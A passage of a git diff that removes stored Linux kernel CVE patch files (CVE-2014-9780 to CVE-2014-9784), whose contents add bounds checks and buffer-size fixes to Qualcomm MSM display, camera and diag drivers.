- ret = remap_pfn_range(vma, vma->vm_start,
- __phys_to_pfn(phys_addr) + vma->vm_pgoff,
- vma->vm_end - vma->vm_start,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9780/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9780/ANY/0001.patch
deleted file mode 100644
index 74af5d5a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9780/ANY/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From b5bb13e1f738f90df11e0c17f843c73999a84a54 Mon Sep 17 00:00:00 2001
-From: Terence Hampson
-Date: Thu, 19 Sep 2013 10:53:18 -0400
-Subject: mdss: mdp3: Validate input from userspace
-
-Fully verify that the values from client are safe to use.
-
-Change-Id: I73d6839f5bccd53b8bc2d812dc7673b13735299c
-Signed-off-by: Terence Hampson
----
- drivers/video/msm/mdss/mdp3_ctrl.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdp3_ctrl.c b/drivers/video/msm/mdss/mdp3_ctrl.c
-index ee51e92..1d6d437 100644
---- a/drivers/video/msm/mdss/mdp3_ctrl.c
-+++ b/drivers/video/msm/mdss/mdp3_ctrl.c
-@@ -1218,7 +1218,8 @@ static int mdp3_ctrl_lut_update(struct msm_fb_data_type *mfd,
- if (!mdp3_session->dma->config_lut)
- return -EINVAL;
-
-- if (cmap->start + cmap->len > MDP_LUT_SIZE) {
-+ if (cmap->start > MDP_LUT_SIZE || cmap->len > MDP_LUT_SIZE ||
-+ (cmap->start + cmap->len > MDP_LUT_SIZE)) {
- pr_err("mdp3_ctrl_lut_update invalid arguments\n");
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9781/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9781/ANY/0001.patch
deleted file mode 100644
index 29a5e0d5..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9781/ANY/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From a2b5237ad265ec634489c8b296d870827b2a1b13 Mon Sep 17 00:00:00 2001
-From: Shalabh Jain
-Date: Tue, 12 Nov 2013 15:10:44 -0800
-Subject: fbcmap: prevent memory overflow
-
-Add bounds check before copying data to prevent
-buffer overflow.
-
-Change-Id: I47b9685b1ab13c4863fb6db62bbb9497a00b36da
-Signed-off-by: Shalabh Jain
----
- drivers/video/fbcmap.c | 6 ++++--
- 1 file changed, 4 insertions(+), 2 deletions(-)
-
-(limited to 'drivers/video')
-
-diff --git a/drivers/video/fbcmap.c b/drivers/video/fbcmap.c
-index 31e93a5..f26570d 100644
---- a/drivers/video/fbcmap.c
-+++ b/drivers/video/fbcmap.c
-@@ -203,11 +203,13 @@ int fb_cmap_to_user(const struct fb_cmap *from, struct fb_cmap_user *to)
- fromoff = to->start - from->start;
- else
- tooff = from->start - to->start;
-+ if ((to->len <= tooff) || (from->len <= fromoff))
-+ return -EINVAL;
-+
- size = to->len - tooff;
-+
- if (size > (int) (from->len - fromoff))
- size = from->len - fromoff;
-- if (size <= 0)
-- return -EINVAL;
- size *= sizeof(u16);
-
- if (from->red && to->red)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9782/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9782/ANY/0001.patch
deleted file mode 100644
index 7fa4a12a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9782/ANY/0001.patch
+++ /dev/null
@@ -1,135 +0,0 @@
-From 2e57a46ab2ba7299d99d9cdc1382bd1e612963fb Mon Sep 17 00:00:00 2001
-From: Hariram Purushothaman
-Date: Wed, 24 Jul 2013 10:42:21 -0700
-Subject: msm: camera: Fix various small issues in Actuator driver
-
-Bound check and validate userspace parameters direction,
-number of steps and direction sign. Also fix possible
-memory leak in certain error cases.
-
-CRs-Fixed: 511349
-Change-Id: Icaa324468574494fb40f2de78e522090806744cb
-Signed-off-by: Hariram Purushothaman
----
- .../msm/camera_v2/sensor/actuator/msm_actuator.c | 40 +++++++++++++++++++---
- include/media/msm_cam_sensor.h | 4 +++
- 2 files changed, 40 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index 87178b7..fe2c16f 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -245,6 +245,20 @@ static int32_t msm_actuator_move_focus(
- if (dest_step_pos == a_ctrl->curr_step_pos)
- return rc;
-
-+ if ((sign_dir > MSM_ACTUATOR_MOVE_SIGNED_NEAR) ||
-+ (sign_dir < MSM_ACTUATOR_MOVE_SIGNED_FAR)) {
-+ pr_err("Invalid sign_dir = %d\n", sign_dir);
-+ return -EFAULT;
-+ }
-+ if ((dir > MOVE_FAR) || (dir < MOVE_NEAR)) {
-+ pr_err("Invalid direction = %d\n", dir);
-+ return -EFAULT;
-+ }
-+ if (dest_step_pos > a_ctrl->total_steps) {
-+ pr_err("Step pos greater than total steps = %d\n",
-+ dest_step_pos);
-+ return -EFAULT;
-+ }
- curr_lens_pos = a_ctrl->step_position_table[a_ctrl->curr_step_pos];
- a_ctrl->i2c_tbl_index = 0;
- CDBG("curr_step_pos =%d dest_step_pos =%d curr_lens_pos=%d\n",
-@@ -318,6 +332,12 @@ static int32_t msm_actuator_init_step_table(struct msm_actuator_ctrl_t *a_ctrl,
- kfree(a_ctrl->step_position_table);
- a_ctrl->step_position_table = NULL;
-
-+ if (set_info->af_tuning_params.total_steps
-+ > MAX_ACTUATOR_AF_TOTAL_STEPS) {
-+ pr_err("Max actuator totalsteps exceeded = %d\n",
-+ set_info->af_tuning_params.total_steps);
-+ return -EFAULT;
-+ }
- /* Fill step position table */
- a_ctrl->step_position_table =
- kmalloc(sizeof(uint16_t) *
-@@ -409,12 +429,19 @@ static int32_t msm_actuator_init(struct msm_actuator_ctrl_t *a_ctrl,
- pr_err("Actuator function table not found\n");
- return rc;
- }
--
-- a_ctrl->region_size = set_info->af_tuning_params.region_size;
-- if (a_ctrl->region_size > MAX_ACTUATOR_REGION) {
-+ if (set_info->af_tuning_params.total_steps
-+ > MAX_ACTUATOR_AF_TOTAL_STEPS) {
-+ pr_err("Max actuator totalsteps exceeded = %d\n",
-+ set_info->af_tuning_params.total_steps);
-+ return -EFAULT;
-+ }
-+ if (set_info->af_tuning_params.region_size
-+ > MAX_ACTUATOR_REGION) {
- pr_err("MAX_ACTUATOR_REGION is exceeded.\n");
- return -EFAULT;
- }
-+
-+ a_ctrl->region_size = set_info->af_tuning_params.region_size;
- a_ctrl->pwd_step = set_info->af_tuning_params.pwd_step;
- a_ctrl->total_steps = set_info->af_tuning_params.total_steps;
-
-@@ -461,7 +488,9 @@ static int32_t msm_actuator_init(struct msm_actuator_ctrl_t *a_ctrl,
- return -EFAULT;
- }
-
-- if (set_info->actuator_params.init_setting_size) {
-+ if (set_info->actuator_params.init_setting_size &&
-+ set_info->actuator_params.init_setting_size
-+ <= MAX_ACTUATOR_REG_TBL_SIZE) {
- if (a_ctrl->func_tbl->actuator_init_focus) {
- init_settings = kmalloc(sizeof(struct reg_settings_t) *
- (set_info->actuator_params.init_setting_size),
-@@ -793,6 +822,7 @@ static int32_t msm_actuator_platform_probe(struct platform_device *pdev)
- &pdev->id);
- CDBG("cell-index %d, rc %d\n", pdev->id, rc);
- if (rc < 0) {
-+ kfree(msm_actuator_t);
- pr_err("failed rc %d\n", rc);
- return rc;
- }
-@@ -801,6 +831,7 @@ static int32_t msm_actuator_platform_probe(struct platform_device *pdev)
- &msm_actuator_t->cci_master);
- CDBG("qcom,cci-master %d, rc %d\n", msm_actuator_t->cci_master, rc);
- if (rc < 0) {
-+ kfree(msm_actuator_t);
- pr_err("failed rc %d\n", rc);
- return rc;
- }
-@@ -817,6 +848,7 @@ static int32_t msm_actuator_platform_probe(struct platform_device *pdev)
- msm_actuator_t->i2c_client.cci_client = kzalloc(sizeof(
- struct msm_camera_cci_client), GFP_KERNEL);
- if (!msm_actuator_t->i2c_client.cci_client) {
-+ kfree(msm_actuator_t);
- pr_err("failed no memory\n");
- return -ENOMEM;
- }
-diff --git a/include/media/msm_cam_sensor.h b/include/media/msm_cam_sensor.h
-index 326e8bf..08a2025 100644
---- a/include/media/msm_cam_sensor.h
-+++ b/include/media/msm_cam_sensor.h
-@@ -40,10 +40,14 @@
- #define MAX_ACTUATOR_REGION 5
- #define MAX_ACTUATOR_INIT_SET 12
- #define MAX_ACTUATOR_REG_TBL_SIZE 8
-+#define MAX_ACTUATOR_AF_TOTAL_STEPS 1024
-
- #define MOVE_NEAR 0
- #define MOVE_FAR 1
-
-+#define MSM_ACTUATOR_MOVE_SIGNED_FAR -1
-+#define MSM_ACTUATOR_MOVE_SIGNED_NEAR 1
-+
- #define MAX_EEPROM_NAME 32
-
- #define MAX_AF_ITERATIONS 3
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9783/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9783/ANY/0001.patch
deleted file mode 100644
index bcb90e1e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9783/ANY/0001.patch
+++ /dev/null
@@ -1,218 +0,0 @@
-From 2b1050b49a9a5f7bb57006648d145e001a3eaa8b Mon Sep 17 00:00:00 2001
-From: Hariram Purushothaman
-Date: Wed, 31 Jul 2013 14:30:36 -0700
-Subject: msm: camera: Fix various small issues in cci driver
-
-Remove some unused ioctl exposed, Also add
-some bound checks for ioctl user params.
-
-Change-Id: Ifdd441fdb25fd20b005c4e4e1ebe4e203f1216ac
-CRs-Fixed: 511382
-Signed-off-by: Hariram Purushothaman
----
- .../platform/msm/camera_v2/sensor/cci/msm_cci.c | 101 +++++++++++++--------
- include/media/msm_cam_sensor.h | 2 +
- 2 files changed, 63 insertions(+), 40 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index 7f4f231..6beb92e 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -41,6 +41,9 @@
-
- /* Max bytes that can be read per CCI read transaction */
- #define CCI_READ_MAX 12
-+#define CCI_I2C_READ_MAX_RETRIES 3
-+#define CCI_I2C_MAX_READ 8192
-+#define CCI_I2C_MAX_WRITE 8192
-
- static struct v4l2_subdev *g_cci_subdev;
-
-@@ -87,36 +90,6 @@ static void msm_cci_set_clk_param(struct cci_device *cci_dev)
- return;
- }
-
--static int32_t msm_cci_i2c_config_sync_timer(struct v4l2_subdev *sd,
-- struct msm_camera_cci_ctrl *c_ctrl)
--{
-- struct cci_device *cci_dev;
-- cci_dev = v4l2_get_subdevdata(sd);
-- msm_camera_io_w(c_ctrl->cci_info->cid, cci_dev->base +
-- CCI_SET_CID_SYNC_TIMER_0_ADDR + (c_ctrl->cci_info->cid * 0x4));
-- return 0;
--}
--
--static int32_t msm_cci_i2c_set_freq(struct v4l2_subdev *sd,
-- struct msm_camera_cci_ctrl *c_ctrl)
--{
-- struct cci_device *cci_dev;
-- uint32_t val;
-- cci_dev = v4l2_get_subdevdata(sd);
-- val = c_ctrl->cci_info->freq;
-- msm_camera_io_w(val, cci_dev->base + CCI_I2C_M0_SCL_CTL_ADDR +
-- c_ctrl->cci_info->cci_i2c_master*0x100);
-- msm_camera_io_w(val, cci_dev->base + CCI_I2C_M0_SDA_CTL_0_ADDR +
-- c_ctrl->cci_info->cci_i2c_master*0x100);
-- msm_camera_io_w(val, cci_dev->base + CCI_I2C_M0_SDA_CTL_1_ADDR +
-- c_ctrl->cci_info->cci_i2c_master*0x100);
-- msm_camera_io_w(val, cci_dev->base + CCI_I2C_M0_SDA_CTL_2_ADDR +
-- c_ctrl->cci_info->cci_i2c_master*0x100);
-- msm_camera_io_w(val, cci_dev->base + CCI_I2C_M0_MISC_CTL_ADDR +
-- c_ctrl->cci_info->cci_i2c_master*0x100);
-- return 0;
--}
--
- static void msm_cci_flush_queue(struct cci_device *cci_dev,
- enum cci_i2c_master_t master)
- {
-@@ -213,8 +186,29 @@ static int32_t msm_cci_data_queue(struct cci_device *cci_dev,
- uint16_t cmd_size = i2c_msg->size;
- struct msm_camera_i2c_reg_conf *i2c_cmd = i2c_msg->reg_conf_tbl;
- enum cci_i2c_master_t master = c_ctrl->cci_info->cci_i2c_master;
-+
-+ if (i2c_cmd == NULL) {
-+ pr_err("%s:%d Failed line\n", __func__,
-+ __LINE__);
-+ return -EINVAL;
-+ }
-+
-+ if ((!cmd_size) || (cmd_size > CCI_I2C_MAX_WRITE)) {
-+ pr_err("%s:%d Failed line\n", __func__, __LINE__);
-+ return -EINVAL;
-+ }
-+
- CDBG("%s addr type %d data type %d\n", __func__,
- i2c_msg->addr_type, i2c_msg->data_type);
-+
-+ if (i2c_msg->addr_type >= MSM_CAMERA_I2C_ADDR_TYPE_MAX) {
-+ pr_err("%s failed line %d\n", __func__, __LINE__);
-+ return -EINVAL;
-+ }
-+ if (i2c_msg->data_type >= MSM_CAMERA_I2C_DATA_TYPE_MAX) {
-+ pr_err("%s failed line %d\n", __func__, __LINE__);
-+ return -EINVAL;
-+ }
- /* assume total size within the max queue */
- while (cmd_size) {
- CDBG("%s cmd_size %d addr 0x%x data 0x%x", __func__,
-@@ -321,6 +315,18 @@ static int32_t msm_cci_i2c_read(struct v4l2_subdev *sd,
- goto ERROR;
- }
-
-+ if (c_ctrl->cci_info->retries > CCI_I2C_READ_MAX_RETRIES) {
-+ pr_err("%s:%d More than max retries\n", __func__,
-+ __LINE__);
-+ goto ERROR;
-+ }
-+
-+ if (read_cfg->data == NULL) {
-+ pr_err("%s:%d Data ptr is NULL\n", __func__,
-+ __LINE__);
-+ goto ERROR;
-+ }
-+
- CDBG("%s master %d, queue %d\n", __func__, master, queue);
- CDBG("%s set param sid 0x%x retries %d id_map %d\n", __func__,
- c_ctrl->cci_info->sid, c_ctrl->cci_info->retries,
-@@ -341,6 +347,11 @@ static int32_t msm_cci_i2c_read(struct v4l2_subdev *sd,
- goto ERROR;
- }
-
-+ if (read_cfg->addr_type >= MSM_CAMERA_I2C_ADDR_TYPE_MAX) {
-+ CDBG("%s failed line %d\n", __func__, __LINE__);
-+ goto ERROR;
-+ }
-+
- if (read_cfg->addr_type == MSM_CAMERA_I2C_BYTE_ADDR)
- val = CCI_I2C_WRITE_DISABLE_P_CMD | (read_cfg->addr_type << 4) |
- ((read_cfg->addr & 0xFF) << 8);
-@@ -454,9 +465,14 @@ static int32_t msm_cci_i2c_read_bytes(struct v4l2_subdev *sd,
- return -EINVAL;
- }
-
-+ if (c_ctrl->cci_info->cci_i2c_master > MASTER_MAX) {
-+ pr_err("%s:%d Invalid I2C master addr\n", __func__, __LINE__);
-+ return -EINVAL;
-+ }
-+
- master = c_ctrl->cci_info->cci_i2c_master;
- read_cfg = &c_ctrl->cfg.cci_i2c_read_cfg;
-- if (!read_cfg->num_byte) {
-+ if ((!read_cfg->num_byte) || (read_cfg->num_byte > CCI_I2C_MAX_READ)) {
- pr_err("%s:%d read num bytes 0\n", __func__, __LINE__);
- rc = -EINVAL;
- goto ERROR;
-@@ -494,6 +510,10 @@ static int32_t msm_cci_i2c_write(struct v4l2_subdev *sd,
- enum cci_i2c_master_t master;
- enum cci_i2c_queue_t queue = QUEUE_0;
- cci_dev = v4l2_get_subdevdata(sd);
-+ if (c_ctrl->cci_info->cci_i2c_master > MASTER_MAX) {
-+ pr_err("%s:%d Invalid I2C master addr\n", __func__, __LINE__);
-+ return -EINVAL;
-+ }
- master = c_ctrl->cci_info->cci_i2c_master;
- CDBG("%s master %d, queue %d\n", __func__, master, queue);
- CDBG("%s set param sid 0x%x retries %d id_map %d\n", __func__,
-@@ -514,6 +534,11 @@ static int32_t msm_cci_i2c_write(struct v4l2_subdev *sd,
- __LINE__, rc);
- goto ERROR;
- }
-+ if (c_ctrl->cci_info->retries > CCI_I2C_READ_MAX_RETRIES) {
-+ pr_err("%s:%d More than max retries\n", __func__,
-+ __LINE__);
-+ goto ERROR;
-+ }
-
- val = CCI_I2C_SET_PARAM_CMD | c_ctrl->cci_info->sid << 4 |
- c_ctrl->cci_info->retries << 16 |
-@@ -533,7 +558,11 @@ static int32_t msm_cci_i2c_write(struct v4l2_subdev *sd,
- goto ERROR;
- }
-
-- msm_cci_data_queue(cci_dev, c_ctrl, queue);
-+ rc = msm_cci_data_queue(cci_dev, c_ctrl, queue);
-+ if (rc < 0) {
-+ CDBG("%s failed line %d\n", __func__, __LINE__);
-+ goto ERROR;
-+ }
- val = CCI_I2C_UNLOCK_CMD;
- CDBG("%s:%d CCI_I2C_UNLOCK_CMD\n", __func__, __LINE__);
- rc = msm_cci_write_i2c_queue(cci_dev, val, master, queue);
-@@ -703,14 +732,6 @@ static int32_t msm_cci_config(struct v4l2_subdev *sd,
- case MSM_CCI_RELEASE:
- rc = msm_cci_release(sd);
- break;
-- case MSM_CCI_SET_SID:
-- break;
-- case MSM_CCI_SET_FREQ:
-- rc = msm_cci_i2c_set_freq(sd, cci_ctrl);
-- break;
-- case MSM_CCI_SET_SYNC_CID:
-- rc = msm_cci_i2c_config_sync_timer(sd, cci_ctrl);
-- break;
- case MSM_CCI_I2C_READ:
- rc = msm_cci_i2c_read_bytes(sd, cci_ctrl);
- break;
-diff --git a/include/media/msm_cam_sensor.h b/include/media/msm_cam_sensor.h
-index 2805401..da16bb8 100644
---- a/include/media/msm_cam_sensor.h
-+++ b/include/media/msm_cam_sensor.h
-@@ -52,6 +52,7 @@ enum msm_camera_i2c_reg_addr_type {
- MSM_CAMERA_I2C_BYTE_ADDR = 1,
- MSM_CAMERA_I2C_WORD_ADDR,
- MSM_CAMERA_I2C_3B_ADDR,
-+ MSM_CAMERA_I2C_ADDR_TYPE_MAX,
- };
-
- enum msm_camera_i2c_data_type {
-@@ -62,6 +63,7 @@ enum msm_camera_i2c_data_type {
- MSM_CAMERA_I2C_SET_WORD_MASK,
- MSM_CAMERA_I2C_UNSET_WORD_MASK,
- MSM_CAMERA_I2C_SET_BYTE_WRITE_MASK_DATA,
-+ MSM_CAMERA_I2C_DATA_TYPE_MAX,
- };
-
- enum msm_sensor_power_seq_type_t {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9783/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-9783/ANY/0002.patch
deleted file mode 100644
index f78fd57b..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9783/ANY/0002.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From a7502f4f801bb95bff73617309835bb7a016cde5 Mon Sep 17 00:00:00 2001
-From: Xu Han
-Date: Wed, 25 Sep 2013 15:28:32 -0700
-Subject: msm: camera: Checking an enum value greater than zero
-
-An enum value cci_i2c_master is not checked to be greater than 0.
-Add the check.
-
-Change-Id: Ibe75ab7155def45d81b8127c5eda3fa2ed570bce
-Signed-off-by: Xu Han
----
- drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c | 8 +++++---
- 1 file changed, 5 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index 273d779..401a671 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -479,7 +479,8 @@ static int32_t msm_cci_i2c_read_bytes(struct v4l2_subdev *sd,
- return -EINVAL;
- }
-
-- if (c_ctrl->cci_info->cci_i2c_master > MASTER_MAX) {
-+ if (c_ctrl->cci_info->cci_i2c_master > MASTER_MAX
-+ || c_ctrl->cci_info->cci_i2c_master < 0) {
- pr_err("%s:%d Invalid I2C master addr\n", __func__, __LINE__);
- return -EINVAL;
- }
-@@ -524,7 +525,8 @@ static int32_t msm_cci_i2c_write(struct v4l2_subdev *sd,
- enum cci_i2c_master_t master;
- enum cci_i2c_queue_t queue = QUEUE_0;
- cci_dev = v4l2_get_subdevdata(sd);
-- if (c_ctrl->cci_info->cci_i2c_master > MASTER_MAX) {
-+ if (c_ctrl->cci_info->cci_i2c_master > MASTER_MAX
-+ || c_ctrl->cci_info->cci_i2c_master < 0) {
- pr_err("%s:%d Invalid I2C master addr\n", __func__, __LINE__);
- return -EINVAL;
- }
-@@ -661,7 +663,7 @@ static int32_t msm_cci_init(struct v4l2_subdev *sd,
- CDBG("%s ref_count %d\n", __func__, cci_dev->ref_count);
- master = c_ctrl->cci_info->cci_i2c_master;
- CDBG("%s:%d master %d\n", __func__, __LINE__, master);
-- if (master < MASTER_MAX) {
-+ if (master < MASTER_MAX && master >= 0) {
- mutex_lock(&cci_dev->cci_master_info[master].mutex);
- /* Set reset pending flag to TRUE */
- cci_dev->cci_master_info[master].reset_pending = TRUE;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9784/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9784/ANY/0001.patch
deleted file mode 100644
index 7314dbab..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9784/ANY/0001.patch
+++ /dev/null
@@ -1,203 +0,0 @@
-From 36503d639cedcc73880974ed92132247576e72ba Mon Sep 17 00:00:00 2001
-From: Sreelakshmi Gownipalli
-Date: Tue, 14 Jan 2014 16:54:46 -0800
-Subject: diag: Fix for diag debugfs buffer overflow
-
-Diag debugfs buffer has potential buffer overflow scenario which can cause
-memory corruption. Added safeguard to prevent this.
-
-Crs-fixed: 585147
-Change-Id: Ie1f099bb4bb626adff99ae225966aef70c1bc15e
-Signed-off-by: Sreelakshmi Gownipalli
----
- drivers/char/diag/diag_debugfs.c | 44 +++++++++++++++++++++++++---------------
- 1 file changed, 28 insertions(+), 16 deletions(-)
-
-diff --git a/drivers/char/diag/diag_debugfs.c b/drivers/char/diag/diag_debugfs.c
-index d63d34b..96c0fa0 100644
---- a/drivers/char/diag/diag_debugfs.c
-+++ b/drivers/char/diag/diag_debugfs.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2013, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2014, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -33,14 +33,14 @@ static ssize_t diag_dbgfs_read_status(struct file *file, char __user *ubuf,
- {
- char *buf;
- int ret;
--
-+ unsigned int buf_size;
- buf = kzalloc(sizeof(char) * DEBUG_BUF_SIZE, GFP_KERNEL);
- if (!buf) {
- pr_err("diag: %s, Error allocating memory\n", __func__);
- return -ENOMEM;
- }
--
-- ret = scnprintf(buf, DEBUG_BUF_SIZE,
-+ buf_size = ksize(buf);
-+ ret = scnprintf(buf, buf_size,
- "modem ch: 0x%p\n"
- "lpass ch: 0x%p\n"
- "riva ch: 0x%p\n"
-@@ -183,7 +183,7 @@ static ssize_t diag_dbgfs_read_status(struct file *file, char __user *ubuf,
- driver->real_time_mode);
-
- #ifdef CONFIG_DIAG_OVER_USB
-- ret += scnprintf(buf+ret, DEBUG_BUF_SIZE,
-+ ret += scnprintf(buf+ret, buf_size-ret,
- "usb_connected: %d\n",
- driver->usb_connected);
- #endif
-@@ -200,7 +200,8 @@ static ssize_t diag_dbgfs_read_dcistats(struct file *file,
- unsigned int bytes_remaining, bytes_written = 0;
- unsigned int bytes_in_buf = 0, i = 0;
- struct diag_dci_data_info *temp_data = dci_data_smd;
-- int buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
-+ unsigned int buf_size;
-+ buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
-
- if (diag_dbgfs_dci_finished) {
- diag_dbgfs_dci_finished = 0;
-@@ -213,6 +214,7 @@ static ssize_t diag_dbgfs_read_dcistats(struct file *file,
- return -ENOMEM;
- }
-
-+ buf_size = ksize(buf);
- bytes_remaining = buf_size;
-
- if (diag_dbgfs_dci_data_index == 0) {
-@@ -281,6 +283,7 @@ static ssize_t diag_dbgfs_read_workpending(struct file *file,
- {
- char *buf;
- int ret;
-+ unsigned int buf_size;
-
- buf = kzalloc(sizeof(char) * DEBUG_BUF_SIZE, GFP_KERNEL);
- if (!buf) {
-@@ -288,7 +291,8 @@ static ssize_t diag_dbgfs_read_workpending(struct file *file,
- return -ENOMEM;
- }
-
-- ret = scnprintf(buf, DEBUG_BUF_SIZE,
-+ buf_size = ksize(buf);
-+ ret = scnprintf(buf, buf_size,
- "Pending status for work_stucts:\n"
- "diag_drain_work: %d\n"
- "Modem data diag_read_smd_work: %d\n"
-@@ -336,7 +340,7 @@ static ssize_t diag_dbgfs_read_workpending(struct file *file,
- diag_notify_update_smd_work)));
-
- #ifdef CONFIG_DIAG_OVER_USB
-- ret += scnprintf(buf+ret, DEBUG_BUF_SIZE,
-+ ret += scnprintf(buf+ret, buf_size-ret,
- "diag_proc_hdlc_work: %d\n"
- "diag_read_work: %d\n",
- work_pending(&(driver->diag_proc_hdlc_work)),
-@@ -357,7 +361,8 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- unsigned int bytes_remaining;
- unsigned int bytes_in_buffer = 0;
- unsigned int bytes_written;
-- int buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
-+ unsigned int buf_size;
-+ buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
-
- if (diag_dbgfs_table_index >= diag_max_reg) {
- /* Done. Reset to prepare for future requests */
-@@ -370,7 +375,7 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- pr_err("diag: %s, Error allocating memory\n", __func__);
- return -ENOMEM;
- }
--
-+ buf_size = ksize(buf);
- bytes_remaining = buf_size;
-
- if (diag_dbgfs_table_index == 0) {
-@@ -379,6 +384,7 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- "WCNSS: %d, APPS: %d\n",
- MODEM_DATA, LPASS_DATA, WCNSS_DATA, APPS_DATA);
- bytes_in_buffer += bytes_written;
-+ bytes_remaining -= bytes_written;
- }
-
- for (i = diag_dbgfs_table_index; i < diag_max_reg; i++) {
-@@ -422,14 +428,15 @@ static ssize_t diag_dbgfs_read_mempool(struct file *file, char __user *ubuf,
- {
- char *buf = NULL;
- int ret = 0, i = 0;
--
-+ unsigned int buf_size;
- buf = kzalloc(sizeof(char) * DEBUG_BUF_SIZE, GFP_KERNEL);
- if (ZERO_OR_NULL_PTR(buf)) {
- pr_err("diag: %s, Error allocating memory\n", __func__);
- return -ENOMEM;
- }
-+ buf_size = ksize(buf);
-
-- ret = scnprintf(buf, DEBUG_BUF_SIZE,
-+ ret = scnprintf(buf, buf_size,
- "POOL_TYPE_COPY: [0x%p : 0x%p] count = %d\n"
- "POOL_TYPE_HDLC: [0x%p : 0x%p] count = %d\n"
- "POOL_TYPE_USER: [0x%p : 0x%p] count = %d\n"
-@@ -454,7 +461,7 @@ static ssize_t diag_dbgfs_read_mempool(struct file *file, char __user *ubuf,
- for (i = 0; i < MAX_HSIC_CH; i++) {
- if (!diag_hsic[i].hsic_inited)
- continue;
-- ret += scnprintf(buf+ret, DEBUG_BUF_SIZE-ret,
-+ ret += scnprintf(buf+ret, buf_size-ret,
- "POOL_TYPE_HSIC_%d: [0x%p : 0x%p] count = %d\n",
- i+1,
- diag_hsic[i].diag_hsic_pool,
-@@ -465,7 +472,7 @@ static ssize_t diag_dbgfs_read_mempool(struct file *file, char __user *ubuf,
- for (i = 0; i < MAX_HSIC_CH; i++) {
- if (!diag_hsic[i].hsic_inited)
- continue;
-- ret += scnprintf(buf+ret, DEBUG_BUF_SIZE-ret,
-+ ret += scnprintf(buf+ret, buf_size-ret,
- "POOL_TYPE_HSIC_%d_WRITE: [0x%p : 0x%p] count = %d\n",
- i+1,
- diag_hsic[i].diag_hsic_write_pool,
-@@ -484,6 +491,7 @@ static ssize_t diag_dbgfs_read_mempool(struct file *file, char __user *ubuf,
- {
- char *buf = NULL;
- int ret = 0;
-+ unsigned int buf_size;
-
- buf = kzalloc(sizeof(char) * DEBUG_BUF_SIZE, GFP_KERNEL);
- if (ZERO_OR_NULL_PTR(buf)) {
-@@ -491,7 +499,8 @@ static ssize_t diag_dbgfs_read_mempool(struct file *file, char __user *ubuf,
- return -ENOMEM;
- }
-
-- ret = scnprintf(buf, DEBUG_BUF_SIZE,
-+ buf_size = ksize(buf);
-+ ret = scnprintf(buf, buf_size,
- "POOL_TYPE_COPY: [0x%p : 0x%p] count = %d\n"
- "POOL_TYPE_HDLC: [0x%p : 0x%p] count = %d\n"
- "POOL_TYPE_USER: [0x%p : 0x%p] count = %d\n"
-@@ -530,10 +539,12 @@ static ssize_t diag_dbgfs_read_bridge(struct file *file, char __user *ubuf,
- unsigned int bytes_remaining;
- unsigned int bytes_in_buffer = 0;
- unsigned int bytes_written;
-- int buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
-+ unsigned int buf_size;
- int bytes_hsic_inited = 45;
- int bytes_hsic_not_inited = 410;
-
-+ buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
-+
- if (diag_dbgfs_finished) {
- diag_dbgfs_finished = 0;
- return 0;
-@@ -545,6 +556,7 @@ static ssize_t diag_dbgfs_read_bridge(struct file *file, char __user *ubuf,
- return -ENOMEM;
- }
-
-+ buf_size = ksize(buf);
